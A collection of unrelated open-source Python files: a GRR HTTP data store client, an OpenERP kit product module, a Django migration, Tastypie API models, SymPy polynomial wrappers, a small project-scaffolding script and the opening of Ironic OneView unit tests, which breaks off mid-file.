self._DoConnection()
@utils.Synchronized
def MakeRequestAndContinue(self, command, unused_subject):
"""Make request but do not sync with the data server."""
while not self._SendRequest(command):
self._RedoConnection()
self.requests.insert(0, command)
return None
@utils.Synchronized
def SyncAndMakeRequest(self, command):
"""Make a request to the data server and return the response."""
if not self._Sync():
# Must reconnect and resend requests.
self._RedoConnection()
# At this point, we have a synchronized connection.
while not self._SendRequest(command):
self._RedoConnection()
self.sock.settimeout(config_lib.CONFIG["HTTPDataStore.read_timeout"])
response = self._ReadReply()
if not response:
# Must reconnect and resend the request.
while True:
self._RedoConnection()
if not self._SendRequest(command):
continue
response = self._ReadReply()
if response:
break
return response
@utils.Synchronized
def Sync(self):
if self._Sync():
return True
self._RedoConnection()
return self._Sync()
def NumPendingRequests(self):
return len(self.requests)
def Close(self):
self.conn.close()
class DataServer(object):
"""A DataServer object contains connections a data server."""
def __init__(self, addr, port):
self.addr = addr
self.port = port
self.conn = httplib.HTTPConnection(self.Address(), self.Port())
self.lock = threading.Lock()
self.max_connections = config_lib.CONFIG["Dataserver.max_connections"]
# Start with a single connection.
self.connections = [DataServerConnection(self)]
def Port(self):
return self.port
def Address(self):
return self.addr
def Close(self):
for conn in self.connections:
conn.Close()
self.connections = []
if self.conn:
self.conn.close()
self.conn = None
@utils.Synchronized
def Sync(self):
for conn in self.connections:
# TODO(user): Consider adding error handling here.
conn.Sync()
@utils.Synchronized
def GetConnection(self):
"""Return a connection to the data server."""
best = min(self.connections, key=lambda x: x.NumPendingRequests())
if best.NumPendingRequests():
if len(self.connections) == self.max_connections:
# Too many connections, use this one.
return best
new = DataServerConnection(self)
self.connections.append(new)
return new
else:
return best
# Attempt to get one connection with no pending requests.
return self.connections[0]
def _FetchMapping(self):
"""Attempt to fetch mapping from the data server."""
try:
self.conn.request("POST", "/client/mapping")
res = self.conn.getresponse()
if res.status != constants.RESPONSE_OK:
return None
return res.read()
except httplib.HTTPException:
logging.warning("Could not connect server %s:%d",
self.Address(), self.Port())
return None
def LoadMapping(self):
"""Load mapping from the data server."""
started = time.time()
while True:
data = self._FetchMapping()
if data:
mapping = rdf_data_server.DataServerMapping.FromSerializedString(data)
return mapping
if time.time() - started > config_lib.CONFIG[
"HTTPDataStore.reconnect_timeout"]:
raise HTTPDataStoreError("Could not get server mapping from data "
"server at %s:%d." %
(self.Address(), self.Port()))
time.sleep(config_lib.CONFIG["HTTPDataStore.retry_time"])
class RemoteInquirer(object):
"""Class that holds connections to all data servers."""
mapping = None
def __init__(self):
# Create a connection to all data servers
server_list = config_lib.CONFIG["Dataserver.server_list"]
if not server_list:
raise HTTPDataStoreError("List of data servers is not available.")
self.servers = []
for location in server_list:
loc = urlparse.urlparse(location, scheme="http")
addr = loc.hostname
port = loc.port
self.servers.append(DataServer(addr, port))
self.mapping_server = random.choice(self.servers)
self.mapping = self.mapping_server.LoadMapping()
if len(self.mapping.servers) != len(server_list):
logging.warning("There is a mismatch between the data "
"servers and the configuration file. '%s' != '%s'",
self.mapping.servers, server_list)
raise HTTPDataStoreError("There is a mismatch between the data "
"servers and the configuration file.")
for i, serv in enumerate(self.mapping.servers):
target = self.servers[i]
if target.Port() != serv.port:
logging.warning("There is a mismatch between the data "
"servers and the configuration file. '%s' != '%s'",
self.mapping.servers, server_list)
raise HTTPDataStoreError("There is a mismatch between the data "
"servers and the configuration file.")
def MapKey(self, key):
"""Return the data server responsible for a given key."""
sid = sutils.MapKeyToServer(self.mapping, key)
return self.servers[sid]
def GetPathing(self):
return self.GetMapping().pathing
def RenewMapping(self):
self.mapping = self.mapping_server.LoadMapping()
return self.mapping
def GetMapping(self):
return self.mapping
def Flush(self):
for serv in self.servers:
serv.Sync()
def CloseConnections(self):
for serv in self.servers:
serv.Close()
class RemoteMappingCache(utils.FastStore):
"""A local cache for mappings between paths and data servers."""
def __init__(self, size):
super(RemoteMappingCache, self).__init__(size)
self.inquirer = RemoteInquirer()
self.path_regexes = [re.compile(x) for x in self.inquirer.GetPathing()]
def KillObject(self, obj):
pass
def GetInquirer(self):
return self.inquirer
@utils.Synchronized
def Get(self, subject):
"""This will create the object if needed so should not fail."""
filename, directory = common.ResolveSubjectDestination(subject,
self.path_regexes)
key = common.MakeDestinationKey(directory, filename)
try:
return super(RemoteMappingCache, self).Get(key)
except KeyError:
data_server = self.inquirer.MapKey(key)
super(RemoteMappingCache, self).Put(key, data_server)
return data_server
def AllDatabases(self):
for server in self.inquirer.servers:
yield server
def GetPrefix(self, prefix):
"""Yields all databases which could contain records begining with prefix."""
components = common.Components(prefix)
components = [common.ConvertStringToFilename(x) for x in components]
path_prefix = utils.JoinPath(*components)
if path_prefix == "/":
path_prefix = ""
for regex in self.path_regexes:
result = common.EvaluatePrefix(path_prefix, regex)
if result == "MATCH":
yield self.Get(prefix)
return
if result == "POSSIBLE":
for data_server in self.AllDatabases():
yield data_server
return
yield self.Get(prefix)
class HTTPDataStore(data_store.DataStore):
"""A data store which calls a remote server."""
cache = None
inquirer = None
def __init__(self):
super(HTTPDataStore, self).__init__()
self.cache = RemoteMappingCache(1000)
self.inquirer = self.cache.GetInquirer()
self._ComputeNewSize(self.inquirer.GetMapping(), time.time())
def GetServer(self, subject):
return self.cache.Get(subject).GetConnection()
def GetServersForPrefix(self, prefix):
for s in self.cache.GetPrefix(prefix):
yield s.GetConnection()
def TimestampSpecFromTimestamp(self, timestamp):
"""Create a timestamp spec from a timestamp value.
Args:
timestamp: A range of times for consideration (In
microseconds). Can be a constant such as ALL_TIMESTAMPS or
NEWEST_TIMESTAMP or a tuple of ints (start, end).
Returns:
An rdfvalue.TimestampSpec() instance.
"""
if timestamp is None:
all_ts = rdf_data_store.TimestampSpec.Type.ALL_TIMESTAMPS
return rdf_data_store.TimestampSpec(type=all_ts)
if timestamp in (rdf_data_store.TimestampSpec.Type.ALL_TIMESTAMPS,
rdf_data_store.TimestampSpec.Type.NEWEST_TIMESTAMP):
return rdf_data_store.TimestampSpec(type=timestamp)
if timestamp == self.NEWEST_TIMESTAMP:
newest = rdf_data_store.TimestampSpec.Type.NEWEST_TIMESTAMP
return rdf_data_store.TimestampSpec(type=newest)
if isinstance(timestamp, (list, tuple)):
start, end = timestamp
return rdf_data_store.TimestampSpec(
start=start,
end=end,
type=rdf_data_store.TimestampSpec.Type.RANGED_TIME)
return rdf_data_store.TimestampSpec(
start=timestamp, type=rdf_data_store.TimestampSpec.Type.SPECIFIC_TIME)
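  # Hedged illustration (not in the original source) of the accepted forms;
  # the microsecond values are made up.
  #
  #   TimestampSpecFromTimestamp(None)                -> ALL_TIMESTAMPS spec
  #   TimestampSpecFromTimestamp((1000000, 2000000))  -> RANGED_TIME spec
  #   TimestampSpecFromTimestamp(1500000)             -> SPECIFIC_TIME spec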
def _MakeSyncRequest(self, request, typ):
return self._MakeRequestSyncOrAsync(request, typ, True)
def _MakeRequestSyncOrAsync(self, request, typ, sync):
subject = request.subject[0]
server = self.GetServer(subject)
cmd = rdf_data_server.DataStoreCommand(command=typ, request=request)
if sync:
return server.SyncAndMakeRequest(cmd)
else:
return server.MakeRequestAndContinue(cmd, subject)
def _MakeRequestsForPrefix(self, prefix, typ, request):
cmd = rdf_data_server.DataStoreCommand(command=typ, request=request)
for server in self.GetServersForPrefix(prefix):
yield server.SyncAndMakeRequest(cmd)
def DeleteAttributes(self,
subject,
attributes,
start=None,
end=None,
sync=True,
token=None):
self.security_manager.CheckDataStoreAccess(token, [subject], "w")
request = rdf_data_store.DataStoreRequest(subject=[subject])
if isinstance(attributes, basestring):
raise ValueError(
"String passed to DeleteAttributes (non string iterable expected).")
# Set timestamp.
start = start or 0
if end is None:
end = (2**63) - 1 # sys.maxint
request.timestamp = rdf_data_store.TimestampSpec(
start=start,
end=end,
type=rdf_data_store.TimestampSpec.Type.RANGED_TIME)
if token:
request.token = token
if sync:
request.sync = sync
for attr in attributes:
request.values.Append(attribute=attr)
typ = rdf_data_server.DataStoreCommand.Command.DELETE_ATTRIBUTES
self._MakeRequestSyncOrAsync(request, typ, sync)
def DeleteSubject(self, subject, sync=False, token=None):
self.security_manager.CheckDataStoreAccess(token, [subject], "w")
request = rdf_data_store.DataStoreRequest(subject=[subject])
if token:
request.token = token
typ = rdf_data_server.DataStoreCommand.Command.DELETE_SUBJECT
self._MakeRequestSyncOrAsync(request, typ, sync)
def _MakeRequest(self,
subjects,
attributes,
timestamp=None,
token=None,
limit=None):
if isinstance(attributes, basestring):
attributes = [attributes]
request = rdf_data_store.DataStoreRequest(subject=subjects)
if limit:
request.limit = limit
token = token or data_store.default_token
if token:
request.token = token
if timestamp is not None:
request.timestamp = self.TimestampSpecFromTimestamp(timestamp)
for attribute in attributes:
request.values.Append(attribute=attribute)
return request
def MultiResolvePrefix(self,
subjects,
attribute_prefix,
timestamp=None,
limit=None,
token=None):
"""MultiResolvePrefix."""
self.security_manager.CheckDataStoreAccess(
token, subjects, self.GetRequiredResolveAccess(attribute_prefix))
typ = rdf_data_server.DataStoreCommand.Command.MULTI_RESOLVE_PREFIX
results = {}
remaining_limit = limit
for subject in subjects:
request = self._MakeRequest(
[subject],
attribute_prefix,
timestamp=timestamp,
token=token,
limit=remaining_limit)
response = self._MakeSyncRequest(request, typ)
if response.results:
result_set = response.results[0]
values = [(pred, self._Decode(value), ts)
for (pred, value, ts) in result_set.payload]
if limit:
if len(values) >= remaining_limit:
results[subject] = values[:remaining_limit]
return results.iteritems()
remaining_limit -= len(values)
results[subject] = values
return results.iteritems()
def ScanAttributes(self,
subject_prefix,
attributes,
after_urn=None,
max_records=None,
token=None,
relaxed_order=False):
"""ScanAttribute."""
subject_prefix = utils.SmartStr(rdfvalue.RDFURN(subject_prefix))
if subject_prefix[-1] != "/":
subject_prefix += "/"
self.security_manager.CheckDataStoreAccess(token, [subject_prefix], "rq")
typ = rdf_data_server.DataStoreCommand.Command.SCAN_ATTRIBUTES
subjects = [subject_prefix]
if after_urn:
subjects.append(after_urn)
request = self._MakeRequest(
subjects, attributes, token=token, limit=max_records)
if relaxed_order:
for response in self._MakeRequestsForPrefix(subject_prefix, typ, request):
for result in response.results:
values = {}
for attribute, (ts, value) in result.payload:
values[attribute] = (ts, self._Decode(value))
yield (result.subject, values)
else:
results = []
for response in self._MakeRequestsForPrefix(subject_prefix, typ, request):
for result in response.results:
values = {}
for attribute, (ts, value) in result.payload:
values[attribute] = (ts, self._Decode(value))
results.append((result.subject, values))
for r in sorted(results, key=lambda x: x[0]):
yield r
def MultiSet(self,
subject,
values,
timestamp=None,
replace=True,
sync=True,
to_delete=None,
token=None):
"""MultiSet."""
self.security_manager.CheckDataStoreAccess(token, [subject], "w")
request = rdf_data_store.DataStoreRequest(sync=sync)
token = token or data_store.default_token
if token:
request.token = token
request.subject.Append(subject)
now = time.time() * 1000000
if timestamp is None or timestamp == self.NEWEST_TIMESTAMP:
timestamp = now
to_delete = set(to_delete or [])
for attribute in to_delete:
if attribute not in values:
values[attribute] = [(None, 0)]
for k, seq in values.items():
for v in seq:
if isinstance(v, basestring):
element_timestamp = timestamp
else:
try:
v, element_timestamp = v
except (TypeError, ValueError):
element_timestamp = timestamp
option = rdf_data_store.DataStoreValue.Option.DEFAULT
if replace or k in to_delete:
option = rdf_data_store.DataStoreValue.Option.REPLACE
new_value = request.values.Append(
attribute=utils.SmartUnicode(k), option=option)
if element_timestamp is None:
element_timestamp = now
new_value.timestamp = self.TimestampSpecFromTimestamp(element_timestamp)
if v is not None:
new_value.value.SetValue(v)
typ = rdf_data_server.DataStoreCommand.Command.MULTI_SET
self._MakeRequestSyncOrAsync(request, typ, sync)
def ResolveMulti(self,
subject,
attributes,
timestamp=None,
limit=None,
token=None):
"""ResolveMulti."""
self.security_manager.CheckDataStoreAccess(
token, [subject], self.GetRequiredResolveAccess(attributes))
request = self._MakeRequest(
[subject], attributes, timestamp=timestamp, limit=limit, token=token)
typ = rdf_data_server.DataStoreCommand.Command.RESOLVE_MULTI
response = self._MakeSyncRequest(request, typ)
results = []
for result in response.results:
for (attribute, value, timestamp) in result.payload:
results.append((attribute, self._Decode(value), timestamp))
return results
def _Decode(self, value):
"""Decodes strings from serialized responses."""
result = value
if isinstance(value, (tuple, list)):
try:
base64value, one = value
if one == 1:
result = base64.decodestring(base64value)
except (ValueError, binascii.Error):
pass
return result
def DBSubjectLock(self, subject, lease_time=None, token=None):
"""We do not support locks directly."""
return HTTPDBSubjectLock(self, subject, lease_time=lease_time, token=token)
def LockSubject(self, subject, lease_time, token):
"""Locks a specific subject."""
self.security_manager.CheckDataStoreAccess(token, [subject], "w")
request = rdf_data_store.DataStoreRequest(subject=[subject])
specific = rdf_data_store.TimestampSpec.Type.SPECIFIC_TIME
request.timestamp = rdf_data_store.TimestampSpec(
start=lease_time, type=specific)
if token:
request.token = token
typ = rdf_data_server.DataStoreCommand.Command.LOCK_SUBJECT
response = self._MakeSyncRequest(request, typ)
if not response.results:
return None
result = response.results[0]
if not result.values:
return None
return result.values[0].value.string
def ExtendSubjectLock(self, subject, transid, lease_time, token):
"""Extends lock of subject."""
self.security_manager.CheckDataStoreAccess(token, [subject], "w")
request = rdf_data_store.DataStoreRequest(subject=[subject])
specific = rdf_data_store.TimestampSpec.Type.SPECIFIC_TIME
request.timestamp = rdf_data_store.TimestampSpec(
start=lease_time, type=specific)
if token:
request.token = token
blob = rdf_protodict.DataBlob(string=transid)
value = rdf_data_store.DataStoreValue(value=blob)
request.values.Append(value)
typ = rdf_data_server.DataStoreCommand.Command.EXTEND_SUBJECT
response = self._MakeSyncRequest(request, typ)
if not response.results:
return None
result = response.results[0]
if not result.values:
return None
value = result.values[0].value.string
return transid if transid == value else None
def UnlockSubject(self, subject, transid, token):
"""Unlocks subject using lock id."""
self.security_manager.CheckDataStoreAccess(token, [subject], "w")
request = rdf_data_store.DataStoreRequest(subject=[subject])
if token:
request.token = token
blob = rdf_protodict.DataBlob(string=transid)
value = rdf_data_store.DataStoreValue(value=blob)
request.values.Append(value)
# We do not care about the server response.
typ = rdf_data_server.DataStoreCommand.Command.UNLOCK_SUBJECT
self._MakeSyncRequest(request, typ)
return transid
def Flush(self):
super(HTTPDataStore, self).Flush()
if self.inquirer:
self.inquirer.Flush()
def CloseConnections(self):
if self.inquirer:
self.inquirer.CloseConnections()
def _ComputeNewSize(self, mapping, new_time):
self.last_size = 0
for serv in mapping.servers:
self.last_size += serv.state.size
self.last_size_update = new_time
def Size(self):
"""Get size of data store."""
now = time.time()
if now < self.last_size_update + 60:
return self.last_size
mapping = self.inquirer.RenewMapping()
self._ComputeNewSize(mapping, now)
return self.last_size
class HTTPDBSubjectLock(data_store.DBSubjectLock):
"""The opensource remote data store subject lock.
We only ensure that two simultaneous locks can not be held on the
same subject.
This means that the first thread which grabs the lock is considered the owner
of the lock. Any subsequent locks on the same subject will fail
immediately with data_store.DBSubjectLockError. NOTE that it is still possible
to manipulate the row without a transaction - this is a design feature!
A lock is considered expired after a certain time.
"""
locked = False
def _Acquire(self, lease_time):
self.transid = self.store.LockSubject(self.subject, lease_time * 1e6,
self.token)
if not self.transid:
raise data_store.DBSubjectLockError("Unable to lock subject %s" %
self.subject)
self.expires = int((time.time() + lease_time) * 1e6)
self.locked = True
def UpdateLease(self, duration):
ret = self.store.ExtendSubjectLock(self.subject, self.transid,
duration * 1e6, self.token)
if ret != self.transid:
raise data_store.DBSubjectLockError("Unable to update the lease on %s" %
self.subject)
self.expires = int((time.time() + duration) * 1e6)
def Release(self):
if self.locked:
self.store.UnlockSubject(self.subject, self.transid, self.token)
self.locked = False
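# Hedged usage sketch (not part of the original module): locks are normally
# obtained through the data store's DBSubjectLock() factory rather than
# instantiated directly; the subject URN and lease below are assumptions.
#
#   lock = data_store.DB.DBSubjectLock("aff4:/some/subject", lease_time=60,
#                                      token=token)
#   try:
#     ...  # mutate the subject while holding the lock
#   finally:
#     lock.Release()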
| destijl/grr | grr/lib/data_stores/http_data_store.py | Python | apache-2.0 | 29,623 |
# -*- coding: utf-8 -*-
from openerp import SUPERUSER_ID
from openerp.osv import fields, osv
from openerp.tools.translate import _
import openerp.addons.decimal_precision as dp
class product(osv.osv):
_inherit = "product.product"
def get_product_available(self, cr, uid, ids, context=None):
""" Finds whether product is available or not in a particular warehouse.
@return: Dictionary of values
"""
bom_pool = self.pool.get("mrp.bom")
res = super(product, self).get_product_available(cr, uid, ids, context=context)
if 'done' not in context.get('states', []) or 'in' not in context.get('what', []):
return res
boms = bom_pool.browse(cr, uid, bom_pool.search(cr, uid, [('product_id', 'in', res.keys())]))
for bom in boms:
if not bom.bom_lines:
continue
quantities = []
for l in bom.bom_lines:
if not l.product_qty:
quantities.append(0)
break
quantities.append(
(res[l.product_id.id] if l.product_id.id in res else l.product_id.qty_available) / l.product_qty)
res[bom.product_id.id] += min(quantities)
return res
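    # Illustrative note (not in the original file): for a kit whose BOM needs
    # 2 of component A and 1 of component B, with 10 A and 3 B on hand, the
    # loop above adds min(10/2, 3/1) = 3 to the kit product's availability.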
product() | ryepdx/kit_sale | product.py | Python | agpl-3.0 | 1,279 |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-07-16 14:32
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Student',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=50)),
('last_name', models.CharField(max_length=50)),
],
options={
'verbose_name': 'Student',
'verbose_name_plural': 'Students',
},
),
migrations.CreateModel(
name='University',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
],
options={
'verbose_name': 'University',
'verbose_name_plural': 'Universities',
},
),
migrations.AddField(
model_name='student',
name='university',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.University'),
),
]
| tiagoprn/experiments | django/drf_swagger/project/apps/core/migrations/0001_initial.py | Python | mit | 1,415 |
import hmac
import time
from django.conf import settings
from django.db import models
from tastypie.utils import now
try:
from hashlib import sha1
except ImportError:
import sha
sha1 = sha.sha
class ApiAccess(models.Model):
"""A simple model for use with the ``CacheDBThrottle`` behaviors."""
identifier = models.CharField(max_length=255)
url = models.CharField(max_length=255, blank=True, default='')
request_method = models.CharField(max_length=10, blank=True, default='')
accessed = models.PositiveIntegerField()
def __unicode__(self):
return u"%s @ %s" % (self.identifier, self.accessed)
def save(self, *args, **kwargs):
self.accessed = int(time.time())
return super(ApiAccess, self).save(*args, **kwargs)
if 'django.contrib.auth' in settings.INSTALLED_APPS:
import uuid
from tastypie.compat import AUTH_USER_MODEL
class ApiKey(models.Model):
user = models.OneToOneField(AUTH_USER_MODEL, related_name='api_key')
key = models.CharField(max_length=256, blank=True, default='', db_index=True)
created = models.DateTimeField(default=now)
def __unicode__(self):
return u"%s for %s" % (self.key, self.user)
def save(self, *args, **kwargs):
if not self.key:
self.key = self.generate_key()
return super(ApiKey, self).save(*args, **kwargs)
def generate_key(self):
# Get a random UUID.
new_uuid = uuid.uuid4()
# Hmac that beast.
return hmac.new(str(new_uuid), digestmod=sha1).hexdigest()
class Meta:
abstract = getattr(settings, 'TASTYPIE_ABSTRACT_APIKEY', False)
def create_api_key(sender, **kwargs):
"""
A signal for hooking up automatic ``ApiKey`` creation.
"""
if kwargs.get('created') is True:
ApiKey.objects.create(user=kwargs.get('instance'))
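    # Hedged example (not part of the original file) of wiring the helper
    # above to the user model, following the usual post_save pattern:
    #
    #   from django.contrib.auth.models import User
    #   from django.db.models import signals
    #   signals.post_save.connect(create_api_key, sender=User)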
| rtucker-mozilla/WhistlePig | vendor-local/lib/python/tastypie/models.py | Python | bsd-3-clause | 1,994 |
from polynomial import Poly
def LexPoly(*args):
"""Returns a polynomial with lexicographic order of terms. """
return Poly(*args, **{ 'order' : 'lex' })
from algorithms import poly_div, poly_pdiv, poly_groebner, poly_lcm, poly_gcd, \
poly_half_gcdex, poly_gcdex, poly_sqf, poly_resultant, poly_subresultants, \
poly_decompose, poly_quo, poly_rem, poly_pquo, poly_prem
from rootfinding import poly_root_factors, poly_sturm
def _conv_args(n, args):
symbols = args[n:]
if len(symbols) == 1 and isinstance(symbols[0], (tuple, list)):
return args[:n] + tuple(symbols[0])
else:
return args
def _map_basic(f, n, *args, **kwargs):
result = f(*_conv_args(n, args), **kwargs)
if isinstance(result, (list, tuple, set)):
return result.__class__(g.as_basic() for g in result)
else:
return result.as_basic()
_funcs = {
'quo' : 2,
'rem' : 2,
'pdiv' : 2,
'pquo' : 2,
'prem' : 2,
'groebner' : 1,
'lcm' : 2,
'gcd' : 2,
'gcdex' : 2,
'half_gcdex' : 2,
'resultant' : 2,
'sqf' : 1,
'decompose' : 1,
'root_factors' : 1,
'sturm' : 1,
}
_func_def = \
"""
def %s(*args, **kwargs):
return _map_basic(poly_%s, %d, *args, **kwargs)
%s.__doc__ = poly_%s.__doc__
"""
for _func, _n in _funcs.iteritems():
exec _func_def % (_func, _func, _n, _func, _func)
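# Illustration only (this comment is not part of the original file): for
# _func = 'gcd' and _n = 2 the exec above defines, roughly,
#
#   def gcd(*args, **kwargs):
#       return _map_basic(poly_gcd, 2, *args, **kwargs)
#   gcd.__doc__ = poly_gcd.__doc__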
def div(*args, **kwargs):
q, r = poly_div(*_conv_args(2, args), **kwargs)
if type(q) is not list:
q = q.as_basic()
else:
q = [ p.as_basic() for p in q ]
return q, r.as_basic()
div.__doc__ = poly_div.__doc__
def subresultants(*args, **kwargs):
result = poly_subresultants(*_conv_args(2, args), **kwargs)
if type(result) is tuple:
res, R = result
else:
res, R = None, result
R = [ r.as_basic() for r in R ]
if res is None:
return R
else:
return res.as_basic(), R
subresultants.__doc__ = poly_subresultants.__doc__
| ryanGT/sympy | sympy/polys/wrappers.py | Python | bsd-3-clause | 2,095 |
#!/usr/bin/python3
import sys
from sys import argv
from os import listdir, system, getcwd, path
from re import findall
from json import loads, dumps
# Rebinding an imported name has no effect on the sys module itself, so set
# the attribute directly to suppress writing .pyc files.
sys.dont_write_bytecode = True
def runProject():
if not path.isdir(getcwd()+"/.jpy"):
print("Project not found!")
return False
openData = open(getcwd()+"/.jpy/data.json")
data = loads(openData.read())
openData.close()
translateCode(getcwd()+"/"+data["name"]+".jpy", data["name"])
for name in data["classes"]:
translateCode(getcwd()+"/"+name+".jpy")
system("python3 -B "+getcwd()+"/"+data["name"]+".py")
def translateCode(filePath, main=False):
openFile = open(filePath)
code = openFile.read()
openFile.close()
for arr in findall(r"class (.*):", code):
code = code.replace("def %s("%arr, "def __init__(")
if main != False:
code = autoImportClasses()+code
code = "from sys import argv\n"+code+"\nif __name__ == \"__main__\": %s().main(argv)" % main
createPythonFile(filePath, code)
def autoImportClasses():
openData = open(getcwd()+"/.jpy/data.json")
data = loads(openData.read())
openData.close()
imports = "\n"
for cls in data["classes"]:
fcls = filterPathToClass(cls)
imports+="from %s import %s\n"%(fcls[1],fcls[0])
imports+="\n"
return imports
def filterPathToClass(path):
fullPath = path
path = path.split("/")
result = ".".join(path)
if len(path) == 1:
fullPath = path[0]
elif len(path) > 1:
fullPath = path[-1]
return [fullPath, result]
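# Illustrative note (not in the original file): the helper above returns the
# bare class name and its dotted import path, e.g.
#   filterPathToClass("utils/Helper")  ->  ["Helper", "utils.Helper"]
#   filterPathToClass("Main")          ->  ["Main", "Main"]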
def createPythonFile(filePath, code):
createFile = open(filePath[0:-3]+"py", "w")
createFile.write(code)
createFile.close()
def createProject(name):
if len(name) < 2:
print("Bad project name!")
return False
if path.isdir(getcwd()+"/.jpy"):
print("Project is created!")
return False
system("cd %s && mkdir .jpy && cd .jpy && echo '{\"name\": \"%s\",\"classes\":[]}' > data.json" % (getcwd(), name))
if not path.isfile(getcwd()+"/"+name+".jpy"):
system("cd %s && echo 'class %s:\n\tdef main(self,args):\n\t\tprint(\"Hello world!\")' > %s.jpy" % (getcwd(), name, name))
print("Project '%s' created!" % name)
def removeProject():
if not path.isdir(getcwd()+"/.jpy"):
print("Project not found!")
return False
system("cd %s && rm .jpy/* && rmdir .jpy && rm *.py" % getcwd())
if path.isdir(getcwd()+"/__pycache__"):
system("cd %s && rm __pycache__/* && rmdir __pycache__" % getcwd())
print("Project removed!")
def createClass(name):
if len(name) < 2:
print("Bad project name!")
return False
if not path.isdir(getcwd()+"/.jpy"):
print("Project not defined!")
return False
fullName = name
name = name.split("/")
if len(name) == 1:
name = name[0]
elif len(name) > 1:
name = name[-1]
if not path.isfile(getcwd()+"/"+name+".jpy"):
createClass = open(getcwd()+"/"+fullName+".jpy","w")
createClass.write('class %s:\n\tdef %s(self):\n\t\tprint(\"Hello module!\")'%(name,name))
createClass.close()
openData = open(getcwd()+"/.jpy/data.json")
data = loads(openData.read())
openData.close()
data["classes"].append(fullName)
updateData = open(getcwd()+"/.jpy/data.json","w")
updateData.write(dumps(data, indent=4))
updateData.close()
print("Class created!")
def removeClass(name):
if len(name) < 2:
print("Bad class name!")
return False
if not path.isdir(getcwd()+"/.jpy"):
print("Project not found!")
return False
if not path.isfile(getcwd()+"/"+name+".jpy"):
print("Class not found!")
return False
openData = open(getcwd()+"/.jpy/data.json")
data = loads(openData.read())
openData.close()
    # Class names are stored under the "classes" key of the project data.
    data["classes"].remove(name)
updateData = open(getcwd()+"/.jpy/data.json", "w")
updateData.write(dumps(data, indent=4))
updateData.close()
def createPackage(name):
if not path.isdir(getcwd()+"/.jpy"):
print("Project not found!")
return False
if path.isdir(getcwd()+"/"+name):
print("Package is created!")
return False
system("cd %s && mkdir %s && cd %s && echo '#init file'> __init__.py" % (getcwd(), name, name))
print("Project created!")
def removePackage(name):
if not path.isdir(getcwd()+"/.jpy"):
print("Project not found!")
return False
if not path.isdir(getcwd()+"/"+name):
print("Package is created!")
return False
try:
system("cd %s && rmdir %s" % (getcwd(), name))
except:
system("cd %s && rm -i %s/* && rmdir %s" % (getcwd(), name, name))
print("Project removed!")
homeCmd = """Java.py v0.0.1(Apha) linux version.
--help - to get help information
Author: Roman Naumenko-Vahnitsky"""
helpCmd = """--init <name> - create project, <name> - name project
--run - run you project
--create class <class_name> - create new class/file
--create package <package_name> - create new package folder
--remove class <class_name> - remove class/file
--remove package <package_name> - remove package folder
--remove project <project_name> - remove project (.jpy files won't delete)"""
if len(argv) >= 2:
if argv[1] == "--init":
try:
createProject(argv[2])
except Exception as e:
print("--init ERROR!\n",e)
elif argv[1] == "--run":
try:
runProject()
except Exception as e:
print("--run ERROR!\n",e)
elif argv[1] == "--create":
try:
if argv[2] == "class":
createClass(argv[3])
if argv[2] == "package":
createPackage(argv[3])
except Exception as e:
print("--create ERROR!\n",e)
elif argv[1] == "--remove":
try:
if argv[2] == "project":
removeProject()
elif argv[2] == "class":
removeClass(argv[3])
elif argv[2] == "package":
removePackage(argv[3])
except Exception as e:
print("--remove ERROR!\n",e)
elif argv[1] == "--help":
print(helpCmd)
else:
print("This unknown me command")
else:
print(homeCmd) | nauma/Java.py | .java.py/main.py | Python | gpl-2.0 | 5,912 |
# Copyright 2015 Hewlett Packard Development Company, LP
# Copyright 2015 Universidade Federal de Campina Grande
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_utils import importutils
from ironic.common import exception
from ironic.common import states
from ironic.conductor import task_manager
from ironic.drivers.modules.oneview import common
from ironic.tests.unit.conductor import mgr_utils
from ironic.tests.unit.db import base as db_base
from ironic.tests.unit.db import utils as db_utils
from ironic.tests.unit.objects import utils as obj_utils
oneview_states = importutils.try_import('oneview_client.states')
class OneViewCommonTestCase(db_base.DbTestCase):
def setUp(self):
super(OneViewCommonTestCase, self).setUp()
self.node = obj_utils.create_test_node(
self.context, driver='fake_oneview',
properties=db_utils.get_test_oneview_properties(),
driver_info=db_utils.get_test_oneview_driver_info(),
)
self.config(manager_url='https://1.2.3.4', group='oneview')
self.config(username='user', group='oneview')
self.config(password='password', group='oneview')
mgr_utils.mock_the_extension_manager(driver="fake_oneview")
def test_verify_node_info(self):
common.verify_node_info(self.node)
def test_verify_node_info_missing_node_properties(self):
self.node.properties = {
"cpu_arch": "x86_64",
"cpus": "8",
"local_gb": "10",
"memory_mb": "4096",
"capabilities": ("enclosure_group_uri:fake_eg_uri,"
"server_profile_template_uri:fake_spt_uri")
}
with self.assertRaisesRegex(exception.MissingParameterValue,
"server_hardware_type_uri"):
common.verify_node_info(self.node)
def test_verify_node_info_missing_node_driver_info(self):
self.node.driver_info = {}
with self.assertRaisesRegex(exception.MissingParameterValue,
"server_hardware_uri"):
common.verify_node_info(self.node)
def test_verify_node_info_missing_spt(self):
properties = db_utils.get_test_oneview_properties()
properties["capabilities"] = ("server_hardware_type_uri:fake_sht_uri,"
"enclosure_group_uri:fake_eg_uri")
self.node.properties = properties
with self.assertRaisesRegex(exception.MissingParameterValue,
"server_profile_template_uri"):
common.verify_node_info(self.node)
def test_verify_node_info_missing_sh(self):
driver_info = db_utils.get_test_oneview_driver_info()
del driver_info["server_hardware_uri"]
properties = db_utils.get_test_oneview_properties()
properties["capabilities"] = (
"server_hardware_type_uri:fake_sht_uri,"
"enclosure_group_uri:fake_eg_uri,"
"server_profile_template_uri:fake_spt_uri"
)
self.node.properties = properties
self.node.driver_info = driver_info
with self.assertRaisesRegex(exception.MissingParameterValue,
"server_hardware_uri"):
common.verify_node_info(self.node)
def test_verify_node_info_missing_sht(self):
